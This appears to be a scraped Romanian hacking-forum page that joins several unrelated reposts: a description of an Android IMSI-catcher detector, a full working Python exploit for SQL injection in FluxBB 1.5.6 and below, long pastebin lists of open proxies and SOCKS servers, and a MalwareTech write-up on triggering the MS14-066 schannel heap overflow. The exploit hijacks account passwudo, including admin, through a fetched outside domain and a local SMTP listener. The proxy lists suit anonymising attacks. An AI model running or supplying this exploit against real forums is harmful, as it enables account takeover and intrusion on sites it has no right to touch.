Practical Cellphone Spying with Kristin Paget (click picture) Unfortunately it seems that IMSI-Catchers have been exponentially popular lately, with an explosion of various "bastards" with governments and criminals all the same, using it. Anyone can now buy an IMSI-Catcher (or build a cheap one on his own). Sending spam and phishing SMS via fake base stations is already a lucrative underground market, particularly in Russia, China and Brazil (see The Mobile Cybercriminal Underground Market in China). For example in China, 1.530 people got arrested for using this kind of equipment. Just recently, hackers decided to start reverse-engineering the NSA toolset and are releasing tools like TWILIGHTVEGETABLE - an easy to use, boot and pwn toolkit for passive monitoring of GSM communications as well as DRIZZLECHAIR as an extension to that system on a 2TB harddrive with all the tools required to crack A5/1 as well as the rainbow tables. It's just a matter of time of when your own neighbor will spy on you with simple self-build tools! In addition, all IMSI-Catchers can crack A5/1 encryption, which is most commonly used for GSM traffic, on the fly (passively)! A5/3 encryption which is used for securing 3G and is offered as new security standard for GSM encryption remains secure in practice while susceptible to theoretical attacks. Although 3G and 4G offer sufficient protection from eavesdropping, the security measures can be bypassed by IMSI-Catchers forcing a mobile device into 2G mode and downgrade encryption to A5/1 or disable it. For further reading on the algorithms, check out the Cryptome GSM Files. There are almost no phones on the market which offer an option to check what kind of encryption is used to secure GSM traffic. And although the Issue of not having a convenient display of the Ciphering Indicator has been assigned to Google since 2009, it seems they're getting paid (or are forced to) blatantly ignoring it. Just recently, a new open source project called the "Android-CipheringIndicator-API" opened its doors to finally craft an API which fixes this Issue and merge the resulting API into the Android AOSP branch. But currently, the only way to protect a mobile device from downgrade attacks is to disable 2G if this option is available. In this case, the phone will not be able to receive or make calls in areas without 3G coverage. This is why the original author named "E:V:A" started this project. Let's detect and protect against these threats! Never think you've got "nothing to hide". Some examples to make you familar with current IMSI-Catcher threats: NSA-Killings with IMSI-Catcher drones. . 28c3: Defending mobile phones. Stingrays: Biggest Technological Threat. GSOC reveals hidden IMSI-Catcher. Secret U.S. Spy Program on Planes Sursa: https://github.com/SecUpwN/Android-IMSI-Catcher-Detector

Felicitari, arata bine. Auzi, vrem si noi, cei de pe forum, sa ne facem tricouri personalizate cu RST. Ne poti ajuta? Info: https://rstforums.com/forum/91554-tricou-rst.rst

FluxBB <= 1.5.6 SQL Injection #!/usr/bin/env python # Friday, November 21, 2014 - secthrowaway () safe-mail net # FluxBB <= 1.5.6 SQL Injection # make sure that your IP is reachable url = 'http://target.tld/forum/' user = 'user' # dummy account pwd = 'test' import urllib, sys, smtpd, asyncore, re, sha from email import message_from_string from urllib2 import Request, urlopen ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36" bindip = '0.0.0.0' def stage1(sql): if len(sql) > 80: sys.exit('SQL too long, max 80 chars') print "1st stage: %s (%d chars)" % (sql, len(sql)) r = urlopen(Request('%sprofile.php?action=change_email&id=%s' % (url, uid), data="form_sent=1&req_new_email=%s&req_password=%s&new_email=Submit" % (urllib.quote(sql), pwd), headers={"Referer": "%sprofile.php" % url, "User-agent": ua, "Cookie": cookie})).read() if 'An email has been sent to the specified address' not in r: sys.exit('err') def stage3(key): print "3rd stage, using key: %s" % key r = urlopen(Request('%sprofile.php?action=change_pass&id=%s&key=%s' % (url, uid, key), headers={"User-agent": ua})).read() if 'Your password has been updated' in r: print 'success' else: print 'err' class stage2_smtp(smtpd.SMTPServer): def process_message(self, peer, mailfrom, rcpttos, data): print '2nd stage: got mail', peer, mailfrom, "to:", rcpttos key = re.search("(https?://.*&key=([^\s]+))", message_from_string(data).get_payload(decode=True), re.MULTILINE) if key is not None: raise asyncore.ExitNow(key.group(2)) return def login(): print "logging in" r = urlopen(Request('%slogin.php?action=in' % url, data="form_sent=1&req_username=%s&req_password=%s" % (user, pwd), headers={"User-agent": ua})) try: t = r.info()['set-cookie'].split(';')[0] return (t.split('=')[1].split('%7C')[0], t) except: sys.exit('unable to login, check user/pass') uid, cookie = login() email_domain = urlopen(Request('http://tns.re/gen')).read() print "using domain: %s" % email_domain #this will change your password to your password stage1('%s\'/**/where/**/id=%s# () %s' % (sha.new(pwd).hexdigest(), uid, email_domain)) #this will change admin's (uid=2) password "123456" #stage1('%s\'/**/where/**/id=%s# () %s' % (sha.new("123456").hexdigest(), 2, email_domain)) try: print "2nd stage: waiting for mail" server = stage2_smtp((bindip, 25), None) asyncore.loop() except asyncore.ExitNow, key: stage3(key) From: secthrowaway () Safe-mail net Date: Fri, 21 Nov 2014 02:23:30 -0500 FluxBB version 1.5.6 and below suffers from a SQL injection vulnerability.Solution: update to FluxBB 1.5.7 Working, automated PoC is attached. Attachment: fluxbb.py Sursa: Full Disclosure: FluxBB <= 1.5.6 SQL Injection

[h=1]22-11-14 | VIP Socks 5 (62)[/h] 22-11-14 | VIP Socks 5 (62) Checked & filtered 1.123.173.67:19065 104.11.133.164:44049 104.139.100.123:42420 104.4.83.73:36221 107.9.49.108:51259 108.24.82.162:35365 109.154.200.72:15052 173.21.14.244:16191 173.245.239.242:59477 173.48.85.6:46660 174.107.164.196:26849 174.116.239.240:35630 176.63.119.172:40136 184.155.143.249:42637 184.68.38.126:50901 198.27.67.24:53050 198.27.67.24:53193 198.50.206.1:443 199.182.225.70:25512 203.110.141.106:52511 203.45.178.175:49437 216.240.53.99:43800 217.66.27.149:7011 23.255.237.44:27588 24.144.145.125:44998 24.154.218.133:33290 24.168.43.58:36072 24.2.214.169:54442 24.229.64.217:5279 24.45.4.130:16063 24.7.95.31:30803 24.93.123.61:2699 31.15.217.3:33078 37.159.220.241:46767 37.57.97.96:24083 61.147.67.2:9125 64.18.119.226:20159 64.229.172.61:19873 66.112.33.144:45581 66.250.241.36:5112 67.58.83.247:39264 69.147.252.172:443 69.76.173.69:30631 70.173.40.165:19102 70.175.230.124:47067 70.184.92.175:25837 71.74.145.212:48814 74.101.164.248:19337 74.194.2.93:15782 74.84.255.109:32936 76.12.56.108:1028 76.180.122.136:29744 78.39.178.2:443 85.222.111.125:22167 90.200.112.137:25859 91.246.235.157:16122 92.245.196.43:5165 96.241.56.92:52074 96.36.39.162:17632 98.193.56.63:28778 98.222.86.109:42368 98.243.193.64:46547 Sursa: 22-11-14 | VIP Socks 5 (62) - Pastebin.com

22-11-14 | L1 High Anonymous Proxies (940) 22-11-14 | L1 High Anonymous Proxies (940) Checked & filtered 123.110.82.126:8088 117.147.246.90:8123 112.18.164.85:8123 182.93.236.22:8080 183.228.197.222:8123 202.114.6.37:9001 180.213.2.154:1337 112.111.114.51:9000 182.234.146.247:8088 111.10.88.235:8123 112.18.186.108:8123 218.207.28.154:8123 119.142.80.95:8585 117.173.18.95:8123 183.222.73.19:8123 111.10.155.212:8123 183.222.182.184:8123 117.176.2.125:8123 223.64.100.118:8123 183.220.198.198:8123 117.175.116.33:8123 223.18.236.163:8088 183.220.235.66:8123 183.228.196.126:8123 183.228.100.129:8123 183.249.20.60:8123 117.174.200.212:8123 183.221.186.212:8123 223.86.208.179:8123 203.172.213.246:8080 130.79.89.237:21320 111.10.101.22:8123 219.68.213.84:8088 183.220.239.167:8123 60.207.63.123:8118 117.176.191.15:8123 112.1.165.17:8123 203.172.222.230:8080 223.86.65.83:8123 1.192.62.103:8585 113.255.41.74:8088 111.9.87.226:8123 183.222.156.80:8123 111.1.3.38:8000 117.175.117.48:8123 183.223.201.147:8123 183.249.52.152:8123 117.139.35.74:8123 111.10.94.186:8123 182.235.37.111:8088 223.85.98.64:8123 183.222.152.160:8123 121.14.138.56:81 223.85.16.92:8123 183.222.172.117:8123 183.223.32.186:8123 219.239.236.49:9999 117.177.44.226:8123 223.85.18.54:8123 123.192.178.150:8088 115.28.85.240:8088 183.222.156.76:8123 117.176.188.152:8123 1.175.48.82:8088 117.173.20.43:8123 120.199.246.0:8123 203.172.209.246:8080 183.222.154.60:8123 223.86.100.43:8123 112.18.92.75:8123 183.223.168.236:8123 117.176.189.40:8123 221.225.117.192:8088 117.176.27.184:8123 1.198.227.78:9000 223.86.14.241:8123 223.86.221.25:8123 222.166.102.139:8088 183.228.36.236:8123 111.10.145.19:8123 223.64.54.95:8123 111.10.130.249:8123 221.178.21.163:8123 117.173.22.10:8123 183.222.157.209:8123 223.86.203.43:8123 223.86.135.250:8123 114.255.183.163:8080 221.178.117.213:8123 223.86.137.155:8123 183.221.217.249:8123 223.85.23.91:8123 203.172.242.190:8080 117.27.157.111:8081 59.148.110.23:8088 117.175.111.110:8123 49.158.118.219:8088 111.10.145.165:8123 183.228.39.207:8123 183.228.238.106:8123 111.10.103.63:8123 119.246.32.164:8088 223.85.81.183:8123 183.222.152.205:8123 111.10.146.230:8123 183.223.169.195:8123 61.15.192.245:8088 223.87.75.190:8123 140.116.91.199:8088 203.172.227.45:8080 221.178.31.243:8123 111.13.55.3:22 183.221.217.130:8123 221.178.23.42:8123 61.191.27.118:1818 116.228.80.186:8080 123.101.201.123:9000 183.228.111.122:8123 59.162.204.150:8080 203.172.203.6:8080 119.80.183.2:8080 114.27.130.117:8088 117.175.101.134:8088 117.174.193.162:8123 183.228.249.182:8123 62.117.58.109:6588 112.18.166.102:8123 85.234.20.131:3128 94.232.9.242:8080 117.175.227.55:8123 183.228.41.136:8123 223.86.223.222:8123 117.175.215.199:8123 183.228.239.56:8123 183.220.244.101:8123 183.228.43.226:8123 183.219.14.137:8123 117.173.22.98:8123 183.223.157.204:8123 211.139.80.180:8080 221.10.40.237:82 122.88.143.151:8123 183.220.154.216:8123 117.176.38.48:8123 115.28.229.8:8088 111.10.131.7:8123 203.172.211.182:8080 223.85.16.104:8123 61.93.246.50:8080 220.132.129.3:8088 117.173.23.22:8123 112.18.0.101:8123 117.173.23.46:8123 183.228.89.217:8123 218.23.185.19:8080 212.42.116.148:8080 112.18.167.177:8123 123.101.201.116:9000 183.222.154.93:8123 117.175.242.116:8123 221.178.22.165:8123 223.86.65.218:8123 140.115.202.134:8088 223.86.219.3:8123 183.220.46.236:8123 111.10.191.68:8123 112.18.196.247:8123 183.228.122.229:8123 117.177.172.176:8123 117.175.118.97:8123 223.86.4.41:8123 117.175.241.120:8123 112.22.8.174:8123 182.234.152.129:8088 183.222.64.143:8123 221.178.25.156:8123 223.86.221.65:8123 111.10.166.154:8123 61.185.32.21:63000 111.10.97.200:8123 182.93.224.14:8080 117.175.241.98:8123 111.10.39.65:8123 111.9.233.17:8123 183.223.35.39:8123 203.172.211.70:8080 112.18.176.217:8123 183.223.242.172:8123 223.86.216.45:8123 112.21.232.176:8123 112.15.99.191:8123 183.228.182.157:8123 118.166.124.129:8088 221.178.23.254:8123 223.86.134.250:8123 117.139.35.231:8123 117.174.214.192:8123 117.176.162.104:8123 115.28.11.165:8888 117.172.77.57:8123 73.152.24.102:80 183.209.236.253:8123 221.178.66.31:8123 183.223.200.142:8123 183.220.245.134:8123 183.224.99.149:8123 183.221.55.66:8123 111.243.68.137:8088 123.110.46.159:8088 183.228.151.130:8123 223.86.101.162:8123 223.85.20.11:8123 183.223.192.172:8123 171.12.1.71:81 111.185.131.85:8088 183.222.74.19:8123 117.175.39.91:8123 183.222.72.156:8123 123.101.201.6:9000 223.64.100.36:8123 223.85.21.65:8123 218.28.74.30:63000 117.139.39.98:8123 183.228.148.62:8123 218.207.11.60:8123 183.223.211.126:8123 123.195.26.231:8088 223.87.77.100:8123 183.222.155.111:8123 221.178.20.8:8123 223.85.97.240:8123 120.199.255.129:8123 223.85.23.64:8123 61.155.169.11:808 183.223.192.125:8123 123.241.50.79:8088 120.199.240.70:8123 183.228.40.127:8123 119.14.58.241:8088 203.171.227.38:8888 117.173.21.221:8123 117.139.29.47:8123 111.9.170.249:8123 112.18.168.179:8123 117.175.192.93:8123 183.222.152.110:8123 223.85.22.98:8123 112.44.234.168:8123 183.223.197.108:8123 123.195.35.100:8088 113.200.220.242:8123 223.87.114.74:8123 60.244.39.225:8088 112.44.230.216:8123 223.86.208.132:8123 114.32.219.221:8088 115.29.249.17:9000 183.222.246.137:8123 61.10.141.128:8088 112.16.78.194:8080 117.176.184.108:8123 183.227.211.79:8123 223.86.223.79:8123 140.206.86.70:8080 183.228.40.108:8123 183.228.141.4:8123 183.223.18.181:8123 221.10.40.238:82 77.70.29.176:81 218.244.138.253:808 221.178.31.130:8123 221.178.77.33:8123 112.18.194.31:8123 117.176.191.199:8123 177.223.228.1:9064 221.178.32.91:8123 140.116.101.93:8088 223.86.3.103:8123 112.18.79.182:8123 111.3.71.108:8123 182.93.241.230:8080 82.146.44.46:8080 117.173.204.147:8123 183.222.82.32:8123 222.220.187.51:8585 223.85.76.105:8123 119.246.126.158:8088 223.86.216.56:8123 183.223.155.74:8123 183.223.32.135:8123 219.153.56.22:8080 203.100.80.81:8080 123.202.145.36:8088 223.86.7.137:8123 117.174.200.120:8123 117.173.232.220:8123 117.176.189.195:8123 203.149.30.82:80 183.223.21.24:8123 221.178.99.51:8123 117.139.34.33:8123 61.177.137.131:63000 223.85.97.171:8123 186.101.75.82:3128 111.10.119.100:8123 111.10.155.184:8123 223.85.100.160:8123 119.77.134.182:8088 183.136.221.6:3128 210.214.27.200:8080 223.86.102.57:8123 171.12.2.131:81 111.184.187.181:8088 49.158.21.212:8088 117.174.197.214:8123 111.10.44.85:8123 117.173.23.28:8123 69.10.137.139:8000 61.182.94.242:63000 183.223.10.174:8123 183.223.35.4:8123 221.10.102.199:843 218.207.11.52:8123 111.10.137.176:8123 111.10.103.175:8123 183.223.195.179:8123 190.200.17.40:21320 183.220.46.85:8123 182.93.218.30:8080 183.228.37.218:8123 111.10.133.203:8123 14.139.111.91:3128 183.228.201.236:8123 222.22.93.252:8088 183.220.245.83:8123 223.86.67.85:8123 173.201.183.172:8000 203.172.222.214:8080 221.178.98.48:8123 60.206.153.177:8118 183.228.192.141:8123 223.85.60.202:8123 111.10.164.159:8123 223.86.216.106:8123 183.223.13.19:8123 117.139.38.32:8123 121.232.13.61:8088 223.86.41.252:8123 183.223.200.77:8123 183.223.153.210:8123 183.222.153.86:8123 202.79.36.119:8080 183.220.247.200:8123 183.222.82.148:8123 210.27.237.111:8088 183.222.178.224:8123 223.86.75.224:8123 183.228.220.58:8123 111.10.158.182:8123 117.173.121.148:8123 112.44.230.36:8123 202.143.154.102:8080 183.227.253.10:8123 161.6.45.63:21320 117.173.245.203:8123 183.222.255.136:8123 223.86.44.133:8123 117.173.18.109:8123 120.199.243.29:8123 117.176.187.81:8123 218.164.150.7:8088 180.153.32.11:8080 183.223.153.13:8123 183.228.243.72:8123 112.18.176.241:8123 118.169.162.252:8088 114.24.110.5:8088 112.18.170.158:8123 111.10.49.255:8123 183.228.138.61:8123 117.172.151.57:8123 223.86.115.53:8123 218.207.12.119:8123 223.87.113.98:8123 183.228.180.247:8123 111.9.234.123:8123 60.26.60.194:8118 223.85.85.2:8123 117.173.240.220:8123 183.228.183.79:8123 223.86.46.182:8123 183.227.209.52:8123 183.222.73.52:8123 221.178.53.138:8123 120.193.60.135:8123 123.193.221.132:8088 183.220.46.113:8123 183.223.198.195:8123 117.173.62.213:8123 117.173.121.254:8123 60.195.3.180:8118 223.85.97.96:8123 183.222.182.36:8123 218.207.208.55:8080 183.223.192.189:8123 114.40.89.234:8088 59.67.83.68:8088 223.85.83.113:8123 112.18.153.221:8123 117.173.21.14:8123 183.228.242.201:8123 117.174.195.3:8123 112.0.104.138:8123 112.0.30.84:8123 117.175.229.239:8123 183.223.21.138:8123 223.85.95.34:8123 123.101.200.185:9000 223.87.190.96:8123 117.173.20.19:8123 202.143.160.193:8080 223.85.19.121:8123 112.44.238.80:8123 113.200.220.39:8123 117.139.28.18:8123 117.174.198.230:8123 223.86.127.178:8123 111.10.155.120:8123 183.228.79.166:8123 117.173.121.177:8123 117.174.196.5:8123 223.85.21.195:8123 111.10.149.20:8123 223.86.127.126:8123 117.173.20.60:8123 183.220.45.35:8123 221.178.54.70:8123 183.222.152.142:8123 117.175.103.247:8123 42.62.24.87:8085 111.10.44.133:8123 183.223.166.13:8123 221.178.55.45:8123 112.18.161.100:8123 111.2.241.208:8123 1.193.52.246:8118 183.223.11.116:8123 85.90.222.240:12345 111.4.120.140:8123 223.87.184.97:8123 183.221.147.191:8123 111.10.155.106:8123 123.203.56.220:8088 117.173.205.160:8123 186.94.214.35:3128 91.185.110.162:21320 117.174.208.172:8123 221.178.80.217:8123 111.10.100.155:8123 112.18.160.141:8123 123.163.124.30:9000 114.38.197.137:8088 117.176.105.176:8123 183.222.172.192:8123 115.29.247.115:8888 183.223.40.63:8123 223.87.190.118:8123 188.2.107.92:21320 222.88.236.236:81 223.85.97.8:8123 112.11.48.4:8088 182.234.251.104:8088 221.10.102.203:82 117.172.78.48:8123 183.223.168.89:8123 221.178.30.190:8123 223.85.96.47:8123 182.93.236.6:8080 223.86.99.57:8123 223.86.223.40:8123 125.71.212.25:9000 223.85.98.166:8123 117.63.0.60:8118 218.95.158.99:63000 49.159.14.176:8088 1.194.8.245:808 123.193.199.41:8088 183.228.72.54:8123 60.206.239.195:8118 112.20.116.103:8123 202.103.150.70:8088 58.115.101.4:8088 112.15.33.108:8123 223.64.100.23:8123 114.255.183.173:8080 117.173.20.230:8123 117.173.242.166:8123 123.101.200.209:9000 223.86.216.249:8123 183.220.244.201:8123 118.161.57.99:8088 112.18.176.138:8123 58.195.5.30:8088 60.191.139.18:9000 183.220.155.167:8123 112.22.252.69:8123 182.93.218.86:8080 183.223.166.223:8123 61.244.4.96:8088 112.3.166.142:8123 111.10.86.249:8123 180.153.32.9:8080 112.22.228.193:8123 223.86.210.46:8123 223.87.114.181:8123 117.175.239.23:8123 112.21.237.134:8123 183.223.20.153:8123 112.18.64.130:8123 223.85.17.108:8123 62.75.229.121:3128 221.178.117.187:8123 223.64.225.78:8123 112.44.245.141:8123 223.86.212.188:8123 183.222.153.130:8123 183.209.110.179:8123 1.170.20.142:8088 221.182.62.30:8123 180.177.194.95:8088 180.102.32.92:8118 111.10.101.185:8123 112.18.92.197:8123 183.222.182.26:8123 223.85.80.160:8123 183.228.246.55:8123 223.85.98.141:8123 183.228.241.174:8123 223.87.190.199:8123 111.10.163.178:8123 117.173.83.111:8123 183.222.155.56:8123 14.136.3.205:8088 218.252.119.131:8088 117.174.201.3:8123 117.173.22.221:8123 112.18.176.26:8123 183.230.53.78:8123 69.64.32.110:12183 183.222.155.175:8123 91.241.18.129:3129 183.228.181.58:8123 112.44.231.164:8123 183.220.247.113:8123 112.111.114.137:9000 112.18.69.249:8123 223.86.221.246:8123 60.166.19.218:63000 111.2.240.145:8123 112.18.194.217:8123 223.85.21.217:8123 112.18.162.147:8123 183.228.89.167:8123 203.172.209.190:8080 117.175.33.9:8123 218.108.168.70:82 106.0.144.6:8080 183.222.158.239:8123 183.222.173.157:8123 111.10.28.146:8123 203.172.216.126:8080 118.122.114.249:9000 183.222.156.225:8123 221.178.75.230:8123 221.182.73.193:8123 183.228.211.133:8123 221.178.31.29:8123 113.164.0.241:8080 183.222.255.183:8123 123.163.120.43:9000 202.77.138.35:8080 111.10.58.82:8123 121.52.229.51:3128 122.88.141.56:8123 202.92.173.189:8088 183.223.166.147:8123 183.228.106.15:8123 111.10.87.91:8123 117.176.184.87:8123 119.14.75.73:8088 112.18.178.43:8123 117.174.192.95:8123 203.172.149.3:8080 123.163.124.29:9000 211.77.5.41:8081 183.245.210.13:8123 117.148.38.134:8123 122.88.169.121:8123 117.139.66.218:8123 223.86.209.94:8123 70.99.146.246:7004 111.10.49.38:8123 111.10.180.195:8123 177.234.12.202:3128 117.173.20.218:8123 183.208.39.173:8123 112.44.245.149:8123 183.221.160.83:8123 112.18.170.143:8123 183.228.183.225:8123 183.220.196.94:8123 117.173.22.139:8123 117.173.254.168:8123 183.222.252.159:8123 117.176.191.178:8123 111.10.100.182:8123 112.22.16.114:8123 117.175.35.89:8123 111.10.152.37:8123 203.172.216.6:8080 117.148.45.107:8123 211.155.86.245:8000 183.211.27.65:8123 117.173.57.179:8123 183.221.190.172:8123 211.143.146.239:82 213.135.234.6:81 60.210.111.42:8088 111.252.52.91:8088 183.223.159.170:8123 183.220.45.82:8123 59.148.166.55:8088 183.222.154.141:8123 117.173.120.85:8123 117.175.243.51:8123 196.201.216.170:8088 118.161.50.236:8088 117.147.221.157:8123 212.185.87.53:443 223.87.185.201:8123 111.10.119.3:8123 117.139.69.239:8123 183.220.168.42:8123 117.174.198.76:8123 117.174.200.220:8123 123.192.19.227:8088 111.250.170.135:8088 183.227.252.113:8123 218.35.182.54:8088 117.173.22.111:8123 218.207.16.238:8123 183.220.246.125:8123 220.134.40.139:8088 122.88.87.34:8123 58.251.78.71:8088 123.163.120.52:9000 111.39.172.53:8088 218.7.132.1:8080 183.223.172.81:8123 221.178.116.167:8123 111.20.177.46:8123 140.114.226.109:8088 111.10.13.255:8123 140.114.212.169:8088 117.173.102.45:8123 183.223.21.71:8123 183.228.43.155:8123 223.87.184.120:8123 183.228.88.2:8123 117.173.204.186:8123 98.211.196.247:3128 223.85.99.203:8123 117.177.173.119:8123 221.182.62.32:8123 221.178.78.9:8123 223.87.108.92:8123 223.85.23.231:8123 221.182.75.210:8123 222.205.127.250:8080 117.175.194.66:8123 202.143.168.150:8080 112.18.165.152:8123 83.219.21.28:8080 112.3.202.182:8123 39.187.49.24:8123 183.209.236.149:8123 183.221.189.89:8123 140.114.207.85:8088 111.9.110.248:8123 183.222.154.114:8123 183.220.246.223:8123 117.175.118.37:8123 223.64.100.24:8123 183.223.196.201:8123 14.136.61.100:8088 119.97.164.48:8085 203.172.222.38:8080 111.10.100.46:8123 183.223.193.50:8123 117.177.174.142:8123 183.221.160.58:8123 202.105.247.122:9999 111.9.87.119:8123 117.176.109.57:8123 221.178.119.225:8123 140.114.216.105:8088 112.18.159.243:8123 221.178.86.25:8123 183.222.86.3:8123 218.14.121.227:9000 183.222.172.196:8123 111.10.97.246:8123 117.176.28.70:8123 219.68.160.90:8088 203.71.152.152:8088 210.43.139.105:8088 111.10.194.219:8123 122.88.215.160:8123 159.226.170.79:8080 183.220.196.58:8123 223.86.119.141:8123 203.172.248.198:8080 115.236.59.194:3128 221.178.122.31:8123 1.175.38.181:8088 1.172.25.3:8088 120.199.226.69:8123 117.173.62.226:8123 117.172.77.182:8123 71.230.131.198:3128 183.220.45.65:8123 183.228.78.93:8123 111.9.174.86:8123 182.234.147.27:8088 117.21.192.8:80 111.10.152.34:8123 117.190.76.46:8088 183.223.204.76:8123 112.15.15.158:8123 183.222.172.77:8123 112.111.114.204:9000 223.86.33.71:8123 180.176.131.157:8088 183.228.209.97:8123 109.197.55.7:3128 117.173.21.190:8123 183.228.234.78:8123 223.86.171.178:8123 27.207.69.232:8088 183.208.34.149:8123 140.206.86.68:8080 113.255.46.78:8088 115.43.229.26:8088 117.173.120.232:8123 183.222.152.219:8123 59.124.1.140:8088 119.236.248.42:8088 112.111.114.72:9000 123.203.77.101:8088 112.112.11.82:8080 223.86.4.207:8123 183.222.155.26:8123 221.178.119.207:8123 183.220.46.211:8123 140.116.132.20:8088 221.178.54.183:8123 112.23.249.200:8123 223.64.127.153:8123 124.11.67.64:8088 183.223.168.159:8123 39.189.100.228:8123 183.222.155.149:8123 112.18.161.122:8123 183.220.161.103:8123 222.167.62.122:8088 113.252.202.126:8088 61.187.249.231:63000 183.223.195.106:8123 183.220.46.97:8123 117.148.47.88:8123 183.221.190.222:8123 117.175.103.228:8123 221.178.96.34:8123 123.194.126.60:8088 223.86.6.181:8123 117.175.36.81:8123 221.224.163.37:9000 117.175.109.112:8123 123.163.120.50:9000 183.228.89.229:8123 42.121.105.155:8888 222.45.100.3:8080 223.86.115.154:8123 183.227.218.154:8123 183.221.217.49:8123 117.174.196.202:8123 117.175.242.222:8123 223.18.251.38:8088 221.178.14.227:8123 111.3.109.130:8123 221.10.40.236:81 58.215.212.243:63000 183.223.194.165:8123 223.86.32.119:8123 183.223.213.205:8123 183.223.242.113:8123 182.93.236.38:8080 111.10.89.189:8123 117.10.244.241:8118 111.10.186.68:8123 125.220.10.125:8088 117.175.213.161:8123 183.228.200.140:8123 211.80.41.192:8088 223.87.76.232:8123 182.93.237.22:8080 111.2.240.170:8123 61.228.25.82:8088 183.222.101.130:8123 183.228.219.244:8123 183.228.242.153:8123 183.221.187.64:8123 117.175.36.150:8123 1.202.15.102:63000 183.245.231.190:8123 218.104.239.12:8118 183.228.193.254:8123 223.86.113.46:8123 221.178.86.204:8123 58.115.139.29:8088 117.139.65.248:8123 212.175.17.237:8080 218.207.53.196:8123 117.175.229.240:8123 123.0.254.83:8088 58.51.197.19:63000 202.115.28.113:808 223.85.98.118:8123 223.87.117.18:8123 111.10.163.97:8123 183.228.181.242:8123 115.154.225.119:8585 183.221.188.121:8123 221.178.83.79:8123 111.184.183.144:8088 112.18.160.251:8123 183.222.173.17:8123 117.175.34.232:8123 111.10.193.29:8123 117.136.166.151:8123 223.86.99.185:8123 118.26.230.75:8080 183.222.158.145:8123 119.6.136.126:82 221.178.20.249:8123 117.173.60.93:8123 118.81.149.200:8088 183.228.72.185:8123 223.86.101.25:8123 223.85.18.23:8123 117.175.124.105:8123 118.194.196.12:8080 116.228.55.217:8003 117.176.1.84:8123 183.222.173.234:8123 223.86.9.193:8123 123.203.96.106:8088 61.57.125.101:8088 117.177.173.131:8123 223.85.99.88:8123 111.10.102.242:8123 221.178.14.231:8123 117.176.162.153:8123 117.173.62.221:8123 112.24.115.214:8123 203.172.233.109:8080 114.43.20.199:8088 203.172.209.49:8080 183.220.46.25:8123 218.35.144.218:8088 119.6.144.70:843 111.10.195.229:8123 182.234.73.217:8088 137.135.166.225:8118 61.155.11.39:9999 219.68.190.87:8088 123.101.194.69:9000 111.10.98.195:8123 183.222.158.92:8123 210.212.245.236:8080 218.207.28.185:8123 111.185.178.5:8088 111.10.138.75:8123 183.228.235.214:8123 202.102.201.99:8080 123.163.120.35:9000 182.93.229.66:8080 182.93.235.118:8080 203.172.149.155:8080 111.10.100.35:8123 211.77.5.38:8081 58.118.216.201:8088 221.178.30.238:8123 223.87.190.26:8123 183.228.103.50:8123 117.175.228.9:8123 124.12.87.119:8088 183.228.78.4:8123 223.86.217.123:8123 112.44.252.46:8123 218.207.17.82:8123 183.220.228.19:8123 223.85.60.74:8123 183.221.160.243:8123 117.175.116.78:8123 223.85.20.254:8123 80.232.255.197:21320 183.222.159.114:8123 117.173.81.168:8123 111.3.78.103:8123 121.55.204.80:8088 183.228.39.8:8123 183.223.12.202:8123 111.10.194.100:8123 223.86.101.160:8123 117.177.166.246:8123 221.178.65.197:8123 223.85.21.235:8123 5.9.70.75:8118 112.15.64.133:8123 182.118.3.228:8888 223.86.117.33:8123 171.12.2.133:81 183.228.232.72:8123 182.93.218.78:8080 221.178.21.198:8123 58.199.150.21:8585 221.215.150.116:8080 117.149.253.1:8123 183.223.203.141:8123 Sursa: 22-11-14 | L1 High Anonymous Proxies (940) - Pastebin.com

[h=3]MS14-066 In Depth Analysis[/h] A few days ago I published an article detailing how a second bug, in the schannel TLS handshake handling, could allow an attacker to trigger the DecodeSigAndReverse heap overflow in an application that doesn't support client certificates. I had stated I was not familiar with ECC signatures and was unsure of how to trigger the exploit; However, a few hours research fixed that. BeyondTrust's post implies they triggered the overflow by randomly modifying the ECC signature, though I believe this is unlikely and was just a safer alternative to disclosing exactly how to trigger the exploit. It was possible for me to achieve remote code execution with either ASLR or DEP disabled, but on a system with both it would prove quite a challenge, thus I'm not too worried about detailing exactly how to trigger the overflow. [h=2]DecodeSigAndReverse[/h] We already know the function in which the overflow occurs, so I decided to work backwards from there. This function is responsible for decoding the ASN.1 (DER) encoded ECC signature and returning it to be verified. The first thing that is done here is the ECC signature is passed to CryptDecodeObject in order to calculate the total size of the decoded signature, which is used to allocate some memory using SPExternalAlloc (LocalAlloc Wrapper). CryptDecodeObject will always handle the signature correctly, with the returned size being sufficient. CryptDecodeObject is now called again, but this time it is passed a pointer to the allocate memory in which to copy the decoded signature. The "cmp ebx, 2Fh" checks the signature type (X509_ECC_SIGNATURE) and will direct the code to the left. The decoded signature is pointed to by an ECC_SIGNATURE header, which is 12 bytes in size an looks something like this. What R and S are doesn't really matter here, all we need to know is they are extremely large integers. Our ECC structure now contains the size of each integer and a pointer to where it's stored. The 2 memcpy operations should be pretty obvious now, the first one copies rSize bytes from R to some allocated memory, then the second copies sSize bytes of S to the same memory directly after R; If there's going to be an overflow It's going to be in the second memcpy. What we don't yet know is the size of the destination memory or how it's allocated. All I had to do to find where the memory gets allocated was to look at the call graph, find the function responsible for coding DecodeSigAndReverse, then scout it for the "Dst" parameter. This is where everything goes right (or wrong if you're Microsoft). _BCryptGetProperty is being passed "KeyLength" to... Drum roll please.... get the key length. Directly below that length is being divided by 8 (converted from bits to bytes) then doubled; this is due to the fact the signature length is (should be) double the key length. Just before the call to DecodeSigAndReverse we can see that the destination buffer is also allocated on the heap. So back at the 2 memcpys now with knowledge of the destination buffer size, we can see exactly what triggers the heap overflow. If we use a key size of 256 bit (32 bytes), then the function is expecting a 512 bit (64 byte) signature, any more will overflow the heap and when it's freed cause a crash. There are very few constraints on the signature, due to the fact the whole thing is just 2 massive integers. As long as we maintain a valid ASN.1 (DER) encoding and the signature is of valid size, we can write arbitrary data to the heap header resulting in an access violation or even remote code execution when the system tries to free the memory. Posted by TM at 11:19 AM Sursa: MS14-066 In Depth Analysis - MalwareTech

Numai posturi de-aa-pulea. La urmatorul ai ban permanent.

